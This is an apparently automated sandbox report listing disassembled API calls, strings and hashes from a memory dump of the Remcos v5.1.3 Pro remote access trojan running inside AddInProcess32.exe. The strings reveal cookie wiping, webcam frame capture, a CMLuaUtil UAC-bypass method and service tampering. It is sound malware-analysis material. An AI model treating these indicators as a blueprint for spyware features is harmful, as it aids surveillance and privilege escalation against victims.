                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseEnumInfoOpenQuerysend
                                                      • String ID: xUG$NG$NG$TG
                                                      • API String ID: 3114080316-2811732169
                                                      • Opcode ID: 7a7e2ed596e912e6ef42e947eeb9eb1de9ee6fb09b7a4cfd1d5d0db7cb7d7a08
                                                      • Instruction ID: 39136fa66a1b3d14a29046baa0c8a2124f92290552efa608aac098e6c3039c27
                                                      • Opcode Fuzzy Hash: 7a7e2ed596e912e6ef42e947eeb9eb1de9ee6fb09b7a4cfd1d5d0db7cb7d7a08
                                                      • Instruction Fuzzy Hash: 03419F316042005AC324F726D852AEF76A99FD1384F40883FF549671D2EF7C5949866E
                                                      APIs
                                                      • MultiByteToWideChar.KERNEL32(?,00000000,000000FF,?,00000000,00000000,0043F918,?,00000000,?,00000001,?,000000FF,00000001,0043F918,?), ref: 004511F9
                                                      • __alloca_probe_16.LIBCMT ref: 00451231
                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00451282
                                                      • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00451294
                                                      • __freea.LIBCMT ref: 0045129D
                                                        • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435349,?,?,004388C7,?,?,00000000,00476B50,?,0040DE9D,00435349,?,?,?,?), ref: 004461EA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                      • String ID: PkGNG
                                                      • API String ID: 313313983-263838557
                                                      • Opcode ID: 9f5a2a67851111230ceb537eb1b7ccf29ba8faad681cfee17df3cfbc13bcf043
                                                      • Instruction ID: f723c28c07ecd650b398e20bb728631ced1c531215915adb10fa1f31571a6cea
                                                      • Opcode Fuzzy Hash: 9f5a2a67851111230ceb537eb1b7ccf29ba8faad681cfee17df3cfbc13bcf043
                                                      • Instruction Fuzzy Hash: F7310331A0020AABDF249F65DC41EAF7BA5EB04701F0445AAFC08E72A2E739CC55CB94
                                                      APIs
                                                        • Part of subcall function 00413656: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?,004750E4), ref: 00413678
                                                        • Part of subcall function 00413656: RegQueryValueExW.ADVAPI32(?,0040F34E,00000000,00000000,?,00000400), ref: 00413697
                                                        • Part of subcall function 00413656: RegCloseKey.ADVAPI32(?), ref: 004136A0
                                                        • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                                      • _wcslen.LIBCMT ref: 0041B7F4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseCurrentOpenProcessQueryValue_wcslen
                                                      • String ID: .exe$8SG$http\shell\open\command$program files (x86)\$program files\
                                                      • API String ID: 37874593-122982132
                                                      • Opcode ID: 6e4530202917b19cbbea06c57cde587f82f9719f354b1f28db5066e5f2e92548
                                                      • Instruction ID: 00334f857bbe6022557327a28fa8f115e820bd32ca6b34e50ab8c41aa79dd428
                                                      • Opcode Fuzzy Hash: 6e4530202917b19cbbea06c57cde587f82f9719f354b1f28db5066e5f2e92548
                                                      • Instruction Fuzzy Hash: 42218872A001046BDB14BAB59CD6AFE766D9B48728F10043FF505B72C3EE3C9D49426D
                                                      APIs
                                                        • Part of subcall function 004135E1: RegOpenKeyExA.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 00413605
                                                        • Part of subcall function 004135E1: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000400), ref: 00413622
                                                        • Part of subcall function 004135E1: RegCloseKey.ADVAPI32(?), ref: 0041362D
                                                      • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040BFA6
                                                      • PathFileExistsA.SHLWAPI(?), ref: 0040BFB3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                                      • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                                      • API String ID: 1133728706-4073444585
                                                      • Opcode ID: b06b8fc2cb4d0c20ff9a3989f2efe758744c2eb59fc0991c33ed663883f7d139
                                                      • Instruction ID: a06d8339010b4a31413dea3cf8b7af81beee50618fccc2c871009a62ab4f9f33
                                                      • Opcode Fuzzy Hash: b06b8fc2cb4d0c20ff9a3989f2efe758744c2eb59fc0991c33ed663883f7d139
                                                      • Instruction Fuzzy Hash: BC215230A40219A6CB14F7F1CC969EE77299F50744F80017FE502B71D1EB7D6945C6DA
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6348a53403ba44e76667cab5d3d4b8c4f90ca5e92cff7b4211fa09d26e343de5
                                                      • Instruction ID: d4e598e7927038c57750db0ba161657e9615562456f8c919f0676739ef068bdb
                                                      • Opcode Fuzzy Hash: 6348a53403ba44e76667cab5d3d4b8c4f90ca5e92cff7b4211fa09d26e343de5
                                                      • Instruction Fuzzy Hash: 931127B2504214BBEB216F768C05D1F7A5CEB86726B52062EFD55C7292DA3CCC0186A8
                                                      APIs
                                                        • Part of subcall function 00450CC1: _free.LIBCMT ref: 00450CEA
                                                      • _free.LIBCMT ref: 00450FC8
                                                        • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                                        • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                      • _free.LIBCMT ref: 00450FD3
                                                      • _free.LIBCMT ref: 00450FDE
                                                      • _free.LIBCMT ref: 00451032
                                                      • _free.LIBCMT ref: 0045103D
                                                      • _free.LIBCMT ref: 00451048
                                                      • _free.LIBCMT ref: 00451053
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast
                                                      • String ID:
                                                      • API String ID: 776569668-0
                                                      • Opcode ID: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                                      • Instruction ID: 345e916fd15b447c36d88a7a8914fd19e4c3e0710e9d23c2e9f19f8556552687
                                                      • Opcode Fuzzy Hash: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                                      • Instruction Fuzzy Hash: C111D231402704AAE621BB72CC03FCB779CAF03304F454D2EBEA967153C7ACB4185654
                                                      APIs
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 004111AB
                                                      • int.LIBCPMT ref: 004111BE
                                                        • Part of subcall function 0040E0FC: std::_Lockit::_Lockit.LIBCPMT ref: 0040E10D
                                                        • Part of subcall function 0040E0FC: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E127
                                                      • std::_Facet_Register.LIBCPMT ref: 004111FE
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00411207
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00411225
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                      • String ID: (mG
                                                      • API String ID: 2536120697-4059303827
                                                      • Opcode ID: 4fb09889b2dc78d6b9bc341806ed1c893def47308d87ec9f5bd5aa626124b671
                                                      • Instruction ID: b4facbf35e110c19f3eede998f69f9310dce987b63f856d60fe44c7d5fb17b17
                                                      • Opcode Fuzzy Hash: 4fb09889b2dc78d6b9bc341806ed1c893def47308d87ec9f5bd5aa626124b671
                                                      • Instruction Fuzzy Hash: 42112732900114A7CB14EB9AD8018DEB7699F44364F11456FF904F72E1DB789E45CBC8
                                                      APIs
                                                        • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                                        • Part of subcall function 004135E1: RegOpenKeyExA.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 00413605
                                                        • Part of subcall function 004135E1: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000400), ref: 00413622
                                                        • Part of subcall function 004135E1: RegCloseKey.ADVAPI32(?), ref: 0041362D
                                                      • StrToIntA.SHLWAPI(00000000,0046CA08,00000000,00000000,00000000,004750E4,00000003,Exe,00000000,0000000E,00000000,004660CC,00000003,00000000), ref: 0041B3CD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseCurrentOpenProcessQueryValue
                                                      • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                      • API String ID: 1866151309-2070987746
                                                      • Opcode ID: 45c7c547461d0a90286b768378f5d74aead19740937584a5a1a9110f100f8656
                                                      • Instruction ID: f33cb4008a08c387480eb48f471200dcc92f04aa72c22424ac0a9b44a4c1d04d
                                                      • Opcode Fuzzy Hash: 45c7c547461d0a90286b768378f5d74aead19740937584a5a1a9110f100f8656
                                                      • Instruction Fuzzy Hash: 8811C47064014926C704B7658C97EFE76198790344F94413BF806A61D3FB6C598683EE
                                                      APIs
                                                      • GetLastError.KERNEL32(?,?,0043A3D1,0043933E), ref: 0043A3E8
                                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0043A3F6
                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A40F
                                                      • SetLastError.KERNEL32(00000000,?,0043A3D1,0043933E), ref: 0043A461
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLastValue___vcrt_
                                                      • String ID:
                                                      • API String ID: 3852720340-0
                                                      • Opcode ID: f8b088146f32705476b05de113eddff258cc1bfa1c523dc592fb57b9cb9462fc
                                                      • Instruction ID: 228fd8bb196f6ae1284969ba5442ea73dc67404c1df350b3d70410c0baad6fb0
                                                      • Opcode Fuzzy Hash: f8b088146f32705476b05de113eddff258cc1bfa1c523dc592fb57b9cb9462fc
                                                      • Instruction Fuzzy Hash: 87019C322483515EA61027797C8A62B2648EB293B9F30523FF518805F1EF984C90910D
                                                      APIs
                                                      • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe), ref: 0040760B
                                                        • Part of subcall function 00407538: _wcslen.LIBCMT ref: 0040755C
                                                        • Part of subcall function 00407538: CoGetObject.OLE32(?,00000024,00466528,00000000), ref: 004075BD
                                                      • CoUninitialize.OLE32 ref: 00407664
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: InitializeObjectUninitialize_wcslen
                                                      • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                                      • API String ID: 3851391207-3324213274
                                                      • Opcode ID: d877cea0863f9d3afa12868748af2f8600b5022738d517222c004e226c4c5a05
                                                      • Instruction ID: e4e7d1672fbddd81374e29e92f863be8f9bad83f72bb7a306ddb251afa86686e
                                                      • Opcode Fuzzy Hash: d877cea0863f9d3afa12868748af2f8600b5022738d517222c004e226c4c5a05
                                                      • Instruction Fuzzy Hash: 4501D272B087116BE2246B65DC4AF6B3748DB41B25F11053FF901A62C1EAB9FC0146AB
                                                      APIs
                                                      • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040BB18
                                                      • GetLastError.KERNEL32 ref: 0040BB22
                                                      Strings
                                                      • [Chrome Cookies found, cleared!], xrefs: 0040BB48
                                                      • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040BAE3
                                                      • [Chrome Cookies not found], xrefs: 0040BB3C
                                                      • UserProfile, xrefs: 0040BAE8
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: DeleteErrorFileLast
                                                      • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                                      • API String ID: 2018770650-304995407
                                                      • Opcode ID: d4592947abf79dc324386ffcaf4b9b591dee499912662422a1d7ea612805fe04
                                                      • Instruction ID: 5dee569c6883bfd73109a670bb68234af0f28e4caad238985ba957b2c74b96e7
                                                      • Opcode Fuzzy Hash: d4592947abf79dc324386ffcaf4b9b591dee499912662422a1d7ea612805fe04
                                                      • Instruction Fuzzy Hash: 5B01DF71A402055BCA04B7B6CC1B9BE7B24E922704B50017FF502726D6FE3E5D0986CE
                                                      APIs
                                                      • AllocConsole.KERNEL32(00475338), ref: 0041CE35
                                                      • ShowWindow.USER32(00000000,00000000), ref: 0041CE4E
                                                      • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CE73
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Console$AllocOutputShowWindow
                                                      • String ID: Remcos v$5.1.3 Pro$CONOUT$
                                                      • API String ID: 2425139147-2212855755
                                                      • Opcode ID: bb520a2f19826cc6a1c283625bbcfbf44085728638f029a4a140c4eec348b460
                                                      • Instruction ID: 6efa3de70d430de9448838496adf33c47162c0890a3ad1875f095e209401f165
                                                      • Opcode Fuzzy Hash: bb520a2f19826cc6a1c283625bbcfbf44085728638f029a4a140c4eec348b460
                                                      • Instruction Fuzzy Hash: A90144B1A80304BBD610F7F19C8BF9E77AC9B14B05F500527BA04A70D2EB6DD944466E
                                                      APIs
                                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,PkGNG,0044338B,00000003,PkGNG,0044332B,00000003,0046E958,0000000C,00443482,00000003,00000002), ref: 004433FA
                                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044340D
                                                      • FreeLibrary.KERNEL32(00000000,?,?,PkGNG,0044338B,00000003,PkGNG,0044332B,00000003,0046E958,0000000C,00443482,00000003,00000002,00000000,PkGNG), ref: 00443430
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                      • String ID: CorExitProcess$PkGNG$mscoree.dll
                                                      • API String ID: 4061214504-213444651
                                                      • Opcode ID: ffd65e2a986ef432bd98aae630379cdfc9b477bc787d361fad657d5437817096
                                                      • Instruction ID: d7bd46dfab834bb5d48edea7818df211002af85bf4a2e706b61bd78119be3437
                                                      • Opcode Fuzzy Hash: ffd65e2a986ef432bd98aae630379cdfc9b477bc787d361fad657d5437817096
                                                      • Instruction Fuzzy Hash: 4EF04931900208FBDB159F65DC45B9EBF74EF04753F0040A5F805A2251DB758E40CA99
                                                      APIs
                                                      • __allrem.LIBCMT ref: 0043ACE9
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD05
                                                      • __allrem.LIBCMT ref: 0043AD1C
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD3A
                                                      • __allrem.LIBCMT ref: 0043AD51
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD6F
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                      • String ID:
                                                      • API String ID: 1992179935-0
                                                      • Opcode ID: 3b7debe300bd30616e6d17b60b5e1d5511deed8aaa3e59a787e888dcedb96ab2
                                                      • Instruction ID: c7cd181284538591ee8af1586cca3d38175ba7b34bac8e5aa56d350f01832762
                                                      • Opcode Fuzzy Hash: 3b7debe300bd30616e6d17b60b5e1d5511deed8aaa3e59a787e888dcedb96ab2
                                                      • Instruction Fuzzy Hash: 5F815972A40B05ABE7209F29CC41B6FB3A99F48324F24152FF591D67C1E77CE910875A
                                                      APIs
                                                      • Sleep.KERNEL32(00000000,?), ref: 004044C4
                                                        • Part of subcall function 00404607: __EH_prolog.LIBCMT ref: 0040460C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: H_prologSleep
                                                      • String ID: CloseCamera$FreeFrame$GetFrame$HNG$OpenCamera
                                                      • API String ID: 3469354165-3054508432
                                                      • Opcode ID: 320c67068b3b288db2e993e88ff11ad854d39230f6bbd9045a2096c25c2dffa0
                                                      • Instruction ID: df1e58e957a7578ae16e417911435538e3341edc64810737793f4aa4f8849b6c
                                                      • Opcode Fuzzy Hash: 320c67068b3b288db2e993e88ff11ad854d39230f6bbd9045a2096c25c2dffa0
                                                      • Instruction Fuzzy Hash: A751E171A042106BCA14FB369D0A66E3755ABC4748F00443FFA0A676E2DF7D8E45839E
                                                      APIs
                                                        • Part of subcall function 004117D7: SetLastError.KERNEL32(0000000D,00411D57,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 004117DD
                                                      • SetLastError.KERNEL32(000000C1,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 00411D72
                                                      • GetNativeSystemInfo.KERNEL32(?,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 00411DE0
                                                      • SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,00000000), ref: 00411E04
                                                        • Part of subcall function 00411CDE: VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,00411E22,?,00000000,00003000,00000040,00000000,?,00000000), ref: 00411CEE
                                                      • GetProcessHeap.KERNEL32(00000008,00000040,?,?,?,?,00000000), ref: 00411E4B
                                                      • HeapAlloc.KERNEL32(00000000,?,?,?,?,00000000), ref: 00411E52
                                                      • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00411F65
                                                        • Part of subcall function 004120B2: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F72,?,?,?,?,00000000), ref: 00412122
                                                        • Part of subcall function 004120B2: HeapFree.KERNEL32(00000000,?,?,?,?,00000000), ref: 00412129
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
                                                      • String ID:
                                                      • API String ID: 3950776272-0
                                                      • Opcode ID: 0997a6c101f2dd0e8850336bac1793923a5345a50e97098554ef69f44a303648
                                                      • Instruction ID: da58ab861bd0a84ec3871346ef31e8b8814b9d9500880b3a3e1890ad13292c25
                                                      • Opcode Fuzzy Hash: 0997a6c101f2dd0e8850336bac1793923a5345a50e97098554ef69f44a303648
                                                      • Instruction Fuzzy Hash: F761A270700611ABCB209F66C981BAA7BA5AF44704F14411AFF05877A2D77CE8C2CBD9
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: __cftoe
                                                      • String ID:
                                                      • API String ID: 4189289331-0
                                                      • Opcode ID: dfe269b3e7c89c95b27fedd159a696e88b5656ec827068c0169833f59e794ee9
                                                      • Instruction ID: b93b8478136607885b926496a305f1bfb884a7f6acf724e610c81469f19cb9e5
                                                      • Opcode Fuzzy Hash: dfe269b3e7c89c95b27fedd159a696e88b5656ec827068c0169833f59e794ee9
                                                      • Instruction Fuzzy Hash: 2551FD72500605ABFF209B598C81EAF77A8EF45334F25421FF915A6293DB3DD900C66D
                                                      APIs
                                                      • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,0041A41F,00000000), ref: 0041AD19
                                                      • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,0041A41F,00000000), ref: 0041AD2D
                                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD3A
                                                      • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0041A41F,00000000), ref: 0041AD6F
                                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD81
                                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD84
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                                      • String ID:
                                                      • API String ID: 493672254-0
                                                      • Opcode ID: f3d4b447748c037b2dac55463b57a149c398f0d820f611c96b244fdc7ed94624
                                                      • Instruction ID: 77e668261cf9ee2bd18e5a0e87596c089765e66a1be6d3c981f75cbf7ed2a716
                                                      • Opcode Fuzzy Hash: f3d4b447748c037b2dac55463b57a149c398f0d820f611c96b244fdc7ed94624
                                                      • Instruction Fuzzy Hash: A7016D311462157AD6111B34AC4EFFB3B6CDB02772F10032BF625965D1DA68CE8195AB
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: __alldvrm$_strrchr
                                                      • String ID: PkGNG
                                                      • API String ID: 1036877536-263838557
                                                      • Opcode ID: 8f78adc186be73fa66820e99e070c83f6be0ee509df7c4dfd67e0dde8c439993
                                                      • Instruction ID: 8ce1af842cd152cb2b2428f5d584a25f6c9224aafe101b92c03b71ca88d34985
                                                      • Opcode Fuzzy Hash: 8f78adc186be73fa66820e99e070c83f6be0ee509df7c4dfd67e0dde8c439993
                                                      • Instruction Fuzzy Hash: 87A156729846829FF721CF58C8817AEBBA5FF15314F2841AFE8859B381D27C8C51C75A
                                                      APIs
                                                      • GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474EF8,PkGNG,0043CE65,FF8BC35D,00474EF8,00474EF8), ref: 00448299
                                                      • _free.LIBCMT ref: 004482CC
                                                      • _free.LIBCMT ref: 004482F4
                                                      • SetLastError.KERNEL32(00000000,?,?,00000000), ref: 00448301
                                                      • SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044830D
                                                      • _abort.LIBCMT ref: 00448313
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLast$_free$_abort
                                                      • String ID:
                                                      • API String ID: 3160817290-0
                                                      • Opcode ID: c2591106eec843b6d6e807480f59c56eb64d59fc50806e925db96e87570db6c2
                                                      • Instruction ID: 8d34d3ffa9a8a5ca7629c839d325bdddc3ef58a145117f7ac1d0225592351e3a
                                                      • Opcode Fuzzy Hash: c2591106eec843b6d6e807480f59c56eb64d59fc50806e925db96e87570db6c2
                                                      • Instruction Fuzzy Hash: 8EF0A435101B006BF611772A6C06B6F26599BD3B69F36042FFD18962D2EF6DCC42816D
                                                      APIs
                                                      • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB46
                                                      • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB5A
                                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB67
                                                      • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB76
                                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB88
                                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB8B
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Service$CloseHandle$Open$ControlManager
                                                      • String ID:
                                                      • API String ID: 221034970-0
                                                      • Opcode ID: bc8933c3fd8e2fa998b2246ab8c72ed9b0f5170f60f0245b371609b51ac54b8f
                                                      • Instruction ID: 443f58cffa4f299642b313368f914f767bd977a6fac550f0ec2f38f013616b5a
                                                      • Opcode Fuzzy Hash: bc8933c3fd8e2fa998b2246ab8c72ed9b0f5170f60f0245b371609b51ac54b8f
                                                      • Instruction Fuzzy Hash: E4F0F631541318BBD7116F259C49DFF3B6CDB45B62F000026FE0992192EB68DD4595F9
                                                      APIs
                                                      • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC4A
                                                      • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC5E
